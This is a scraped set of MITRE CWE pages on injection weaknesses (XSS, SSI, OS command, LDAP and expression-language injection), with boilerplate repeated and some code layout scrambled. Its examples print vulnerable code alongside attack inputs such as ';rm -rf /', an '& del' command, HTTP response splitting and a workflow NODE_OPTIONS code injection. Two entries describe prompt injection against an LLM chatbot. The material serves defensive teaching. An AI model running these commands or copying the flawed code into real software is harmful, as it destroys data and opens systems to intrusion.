This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-83: Improper Neutralization of Script in Attributes in a Web Page
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not neutralize or incorrectly neutralizes "javascript:" or other URIs from dangerous attributes within tags, such as onmouseover, onload, onerror, or style.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following example, a guestbook comment isn't properly encoded, filtered, or otherwise neutralized for script-related tags before being displayed in a client browser. (bad code)
Example Language: JSP
<% for (Iterator i = guestbook.iterator(); i.hasNext(); ) {
Entry e = (Entry) i.next(); %>
<p>Entry #<%= e.getId() %></p> <p><%= e.getText() %></p> <% } %> Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other
Although this can be classified as an injection problem, the more pertinent issue is the improper conversion of such special characters to respective context-appropriate entities before displaying them to the user.
CWE-97: Improper Neutralization of Server-Side Includes (SSI) Within a Web Page
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product generates a web page, but does not neutralize or incorrectly neutralizes user-controllable input that could be interpreted as a server-side include (SSI) directive.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This can be resultant from XSS/HTML injection because the same special characters can be involved. However, this is server-side code execution, not client-side.
CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This example code intends to take the name of a user and list the contents of that user's home directory. It is subject to the first variant of OS command injection. (bad code)
Example Language: PHP
$userName = $_POST["user"];
$command = 'ls -l /home/' . $userName; system($command); The $userName variable is not checked for malicious input. An attacker could set the $userName variable to an arbitrary OS command such as: (attack code)
;rm -rf /
Which would result in $command being: (result)
ls -l /home/;rm -rf /
Since the semi-colon is a command separator in Unix, the OS would first execute the ls command, then the rm command, deleting the entire file system. Also note that this example code is vulnerable to Path Traversal (CWE-22) and Untrusted Search Path (CWE-426) attacks. Example 2 The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response. (bad code)
Example Language: Java
String author = request.getParameter(AUTHOR_PARAM);
... Cookie cookie = new Cookie("author", author); cookie.setMaxAge(cookieExpiration); response.addCookie(cookie); Assuming a string consisting of standard alpha-numeric characters, such as "Jane Smith", is submitted in the request the HTTP response including this cookie might take the following form: (result)
HTTP/1.1 200 OK
... Set-Cookie: author=Jane Smith ... However, because the value of the cookie is composed of unvalidated user input, the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as (attack code)
Wiley Hacker\r\nHTTP/1.1 200 OK\r\n
then the HTTP response would be split into two responses of the following form: (result)
HTTP/1.1 200 OK
... Set-Cookie: author=Wiley Hacker HTTP/1.1 200 OK ... The second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability to construct arbitrary HTTP responses permits a variety of resulting attacks, including:
Example 3 Consider the following program. It intends to perform an "ls -l" on an input filename. The validate_name() subroutine performs validation on the input to make sure that only alphanumeric and "-" characters are allowed, which avoids path traversal (CWE-22) and OS command injection (CWE-78) weaknesses. Only filenames like "abc" or "d-e-f" are intended to be allowed. (bad code)
Example Language: Perl
my $arg = GetArgument("filename");
do_listing($arg); sub do_listing {
my($fname) = @_;
}
if (! validate_name($fname)) {
print "Error: name is not well-formed!\n";
}return; # build command my $cmd = "/bin/ls -l $fname"; system($cmd); sub validate_name {
my($name) = @_;
}
if ($name =~ /^[\w\-]+$/) {
return(1);
}else {
return(0);
}However, validate_name() allows filenames that begin with a "-". An adversary could supply a filename like "-aR", producing the "ls -l -aR" command (CWE-88), thereby getting a full recursive listing of the entire directory and all of its sub-directories. There are a couple possible mitigations for this weakness. One would be to refactor the code to avoid using system() altogether, instead relying on internal functions. Another option could be to add a "--" argument to the ls command, such as "ls -l --", so that any remaining arguments are treated as filenames, causing any leading "-" to be treated as part of a filename instead of another option. Another fix might be to change the regular expression used in validate_name to force the first character of the filename to be a letter or number, such as: (good code)
Example Language: Perl
if ($name =~ /^\w[\w\-]+$/) ...
Example 4 Consider a "CWE Differentiator" application that uses an an LLM generative AI based "chatbot" to explain the difference between two weaknesses. As input, it accepts two CWE IDs, constructs a prompt string, sends the prompt to the chatbot, and prints the results. The prompt string effectively acts as a command to the chatbot component. Assume that invokeChatbot() calls the chatbot and returns the response as a string; the implementation details are not important here. (bad code)
Example Language: Python
prompt = "Explain the difference between {} and {}".format(arg1, arg2)
result = invokeChatbot(prompt) resultHTML = encodeForHTML(result) print resultHTML To avoid XSS risks, the code ensures that the response from the chatbot is properly encoded for HTML output. If the user provides CWE-77 and CWE-78, then the resulting prompt would look like: However, the attacker could provide malformed CWE IDs containing malicious prompts such as: This would produce a prompt like: Instead of providing well-formed CWE IDs, the adversary has performed a "prompt injection" attack by adding an additional prompt that was not intended by the developer. The result from the maliciously modified prompt might be something like this: While the attack in this example is not serious, it shows the risk of unexpected results. Prompts can be constructed to steal private information, invoke unexpected agents, etc. In this case, it might be easiest to fix the code by validating the input CWE IDs: (good code)
Example Language: Python
cweRegex = re.compile("^CWE-\d+$")
match1 = cweRegex.search(arg1) match2 = cweRegex.search(arg2) if match1 is None or match2 is None:
# throw exception, generate error, etc.
prompt = "Explain the difference between {} and {}".format(arg1, arg2)... Example 5 The following code is a workflow job written using YAML. The code attempts to download pull request artifacts, unzip from the artifact called pr.zip and extract the value of the file NR into a variable "pr_number" that will be used later in another job. It attempts to create a github workflow environment variable, writing to $GITHUB_ENV. The environment variable value is retrieved from an external resource. (bad code)
Example Language: Other
name: Deploy Preview
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- name: 'Download artifact'
uses: actions/github-script with:
script: |
- run: |
var artifacts = await github.actions.listWorkflowRunArtifacts({
owner: context.repo.owner,
});repo: context.repo.repo, run_id: ${{ github.event.workflow_run.id }}, var matchPrArtifact = artifacts.data.artifacts.filter((artifact) => {
return artifact.name == "pr"
})[0];var downloadPr = await github.actions.downloadArtifact({
owner: context.repo.owner,
});repo: context.repo.repo, artifact_id: matchPrArtifact.id, archive_format: 'zip', var fs = require('fs'); fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data));
unzip pr.zip
echo "pr_number=$(cat NR)" >> $GITHUB_ENV
The code does not neutralize the value of the file NR, e.g. by validating that NR only contains a number (CWE-1284). The NR file is attacker controlled because it originates from a pull request that produced pr.zip. The attacker could escape the existing pr_number and create a new variable using a "\n" (CWE-93) followed by any environment variable to be added such as: (attack code)
\nNODE_OPTIONS="--experimental-modules --experiments-loader=data:text/javascript,console.log('injected code');//"
This would result in injecting and running javascript code (CWE-94) on the workflow runner with elevated privileges. (good code)
Example Language: Other
The code could be modified to validate that the NR
file only contains a numeric value, or the code could
retrieve the PR number from a more trusted source.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Theoretical
Many people treat injection only as an input validation problem (CWE-20) because many people do not distinguish between the consequence/attack (injection) and the protection mechanism that prevents the attack from succeeding. However, input validation is only one potential protection mechanism (output encoding is another), and there is a chaining relationship between improper input validation and the improper enforcement of the structure of messages to other components. Other issues not directly related to input validation, such as race conditions, could similarly impact message structure.
Other
Software or other automated logic has certain assumptions about what constitutes data and control respectively. It is the lack of verification of these assumptions for user-controlled input that leads to injection problems. This means that the execution of the component may be altered through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed.
Maintenance
For many years, there have been significant subtree
overlap challenges between CWE-138 (and descendants) and
CWE-74 (and descendants) due to variances in the "facets" or
"dimensions" of abstraction. Under CWE-138, entries are
hierarchically organized around the "type of special
element" that is not neutralized. Under CWE-74,
hierarchical organization is around the "type of
data/command" that is affected. This multi-faceted
challenge will require extensive research and significant
changes that have not been able to be resolved as of CWE
4.19.
CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterMany protocols and products have their own custom command language. While OS or shell command strings are frequently discovered and targeted, developers may not realize that these other command languages might also be vulnerable to attacks.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Consider a "CWE Differentiator" application that uses an an LLM generative AI based "chatbot" to explain the difference between two weaknesses. As input, it accepts two CWE IDs, constructs a prompt string, sends the prompt to the chatbot, and prints the results. The prompt string effectively acts as a command to the chatbot component. Assume that invokeChatbot() calls the chatbot and returns the response as a string; the implementation details are not important here. (bad code)
Example Language: Python
prompt = "Explain the difference between {} and {}".format(arg1, arg2)
result = invokeChatbot(prompt) resultHTML = encodeForHTML(result) print resultHTML To avoid XSS risks, the code ensures that the response from the chatbot is properly encoded for HTML output. If the user provides CWE-77 and CWE-78, then the resulting prompt would look like: However, the attacker could provide malformed CWE IDs containing malicious prompts such as: This would produce a prompt like: Instead of providing well-formed CWE IDs, the adversary has performed a "prompt injection" attack by adding an additional prompt that was not intended by the developer. The result from the maliciously modified prompt might be something like this: While the attack in this example is not serious, it shows the risk of unexpected results. Prompts can be constructed to steal private information, invoke unexpected agents, etc. In this case, it might be easiest to fix the code by validating the input CWE IDs: (good code)
Example Language: Python
cweRegex = re.compile("^CWE-\d+$")
match1 = cweRegex.search(arg1) match2 = cweRegex.search(arg2) if match1 is None or match2 is None:
# throw exception, generate error, etc.
prompt = "Explain the difference between {} and {}".format(arg1, arg2)... Example 2 Consider the following program. It intends to perform an "ls -l" on an input filename. The validate_name() subroutine performs validation on the input to make sure that only alphanumeric and "-" characters are allowed, which avoids path traversal (CWE-22) and OS command injection (CWE-78) weaknesses. Only filenames like "abc" or "d-e-f" are intended to be allowed. (bad code)
Example Language: Perl
my $arg = GetArgument("filename");
do_listing($arg); sub do_listing {
my($fname) = @_;
}
if (! validate_name($fname)) {
print "Error: name is not well-formed!\n";
}return; # build command my $cmd = "/bin/ls -l $fname"; system($cmd); sub validate_name {
my($name) = @_;
}
if ($name =~ /^[\w\-]+$/) {
return(1);
}else {
return(0);
}However, validate_name() allows filenames that begin with a "-". An adversary could supply a filename like "-aR", producing the "ls -l -aR" command (CWE-88), thereby getting a full recursive listing of the entire directory and all of its sub-directories. There are a couple possible mitigations for this weakness. One would be to refactor the code to avoid using system() altogether, instead relying on internal functions. Another option could be to add a "--" argument to the ls command, such as "ls -l --", so that any remaining arguments are treated as filenames, causing any leading "-" to be treated as part of a filename instead of another option. Another fix might be to change the regular expression used in validate_name to force the first character of the filename to be a letter or number, such as: (good code)
Example Language: Perl
if ($name =~ /^\w[\w\-]+$/) ...
Example 3 The following simple program accepts a filename as a command line argument and displays the contents of the file back to the user. The program is installed setuid root because it is intended for use as a learning tool to allow system administrators in-training to inspect privileged system files without giving them the ability to modify them or damage the system. (bad code)
Example Language: C
int main(int argc, char** argv) {
char cmd[CMD_MAX] = "/usr/bin/cat "; }strcat(cmd, argv[1]); system(cmd); Because the program runs with root privileges, the call to system() also executes with root privileges. If a user specifies a standard filename, the call works as expected. However, if an attacker passes a string of the form ";rm -rf /", then the call to system() fails to execute cat due to a lack of arguments and then plows on to recursively delete the contents of the root partition, leading to OS command injection (CWE-78). Note that if argv[1] is a very long argument, then this issue might also be subject to a buffer overflow (CWE-120). Example 4 The following code is from an administrative web application designed to allow users to kick off a backup of an Oracle database using a batch-file wrapper around the rman utility and then run a cleanup.bat script to delete some temporary files. The script rmanDB.bat accepts a single command line parameter, which specifies what type of backup to perform. Because access to the database is restricted, the application runs the backup as a privileged user. (bad code)
Example Language: Java
...
String btype = request.getParameter("backuptype"); String cmd = new String("cmd.exe /K \" c:\\util\\rmanDB.bat "
+btype+ "&&c:\\utl\\cleanup.bat\"") System.Runtime.getRuntime().exec(cmd); ... The problem here is that the program does not do any validation on the backuptype parameter read from the user. Typically the Runtime.exec() function will not execute multiple commands, but in this case the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec(). Once the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form "& del c:\\dbms\\*.*", then the application will execute this command along with the others specified by the program. Because of the nature of the application, it runs with the privileges necessary to interact with the database, which means whatever command the attacker injects will run with those privileges as well. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Terminology The "command injection" phrase carries different meanings, either as an attack or as a technical impact. The most common usage of "command injection" refers to the more-accurate OS command injection (CWE-78), but there are many command languages. In vulnerability-focused analysis, the phrase may refer to any situation in which the adversary can execute commands of their own choosing, i.e., the focus is on the risk and/or technical impact of exploitation. Many proof-of-concept exploits focus on the ability to execute commands and may emphasize "command injection." However, there are dozens of weaknesses that can allow execution of commands. That is, the ability to execute commands could be resultant from another weakness. To some, "command injection" can include cases in which the functionality intentionally allows the user to specify an entire command, which is then executed. In this case, the root cause weakness might be related to missing or incorrect authorization, since an adversary should not be able to specify arbitrary commands, but some users or admins are allowed. CWE-77 and its descendants are specifically focused on behaviors in which the product is intentionally building a command to execute, and the adversary can inject separators into the command or otherwise change the command being executed. Other Command injection is a common problem with wrapper programs.
CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product constructs all or part of an expression language (EL) statement in a framework such as a Java Server Page (JSP) using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended EL statement before it is executed.
Frameworks such as Java Server Page (JSP) allow a developer to insert executable expressions within otherwise-static content. When the developer is not aware of the executable nature of these expressions and/or does not disable them, then if an attacker can inject expressions, this could lead to code execution or other unexpected behaviors.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
In certain versions of Spring 3.0.5 and earlier, there was a vulnerability (CVE-2011-2730) in which Expression Language tags would be evaluated twice, which effectively exposed any application to EL injection. However, even for later versions, this weakness is still possible depending on configuration.
CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product constructs all or part of an LDAP query using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended LDAP query when it is sent to a downstream component.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The code below constructs an LDAP query using user input address data: (bad code)
Example Language: Java
context = new InitialDirContext(env);
String searchFilter = "StreetAddress=" + address; NamingEnumeration answer = context.search(searchBase, searchFilter, searchCtls); Because the code fails to neutralize the address string used to construct the query, an attacker can supply an address that includes additional LDAP queries. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
Factors: resultant to special character mismanagement, MAID, or denylist/allowlist problems. Can be primary to authentication and verification errors.
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThis weakness can lead to a vulnerability in environments in which the attacker does not have direct access to the operating system, such as in web applications. Alternately, if the weakness occurs in a privileged program, it could allow the attacker to specify commands that normally would not be accessible, or to call alternate commands with privileges that the attacker does not have. The problem is exacerbated if the compromised process does not follow the principle of least privilege, because the attacker-controlled commands may run with special system privileges that increases the amount of damage. There are at least two subtypes of OS command injection:
From a weakness standpoint, these variants represent distinct programmer errors. In the first variant, the programmer clearly intends that input from untrusted parties will be part of the arguments in the command to be executed. In the second variant, the programmer does not intend for the command to be accessible to any untrusted party, but the programmer probably has not accounted for alternate ways in which malicious attackers can provide input. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Quality Measures (2020)" (View-1305)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This example code intends to take the name of a user and list the contents of that user's home directory. It is subject to the first variant of OS command injection. (bad code)
Example Language: PHP
$userName = $_POST["user"];
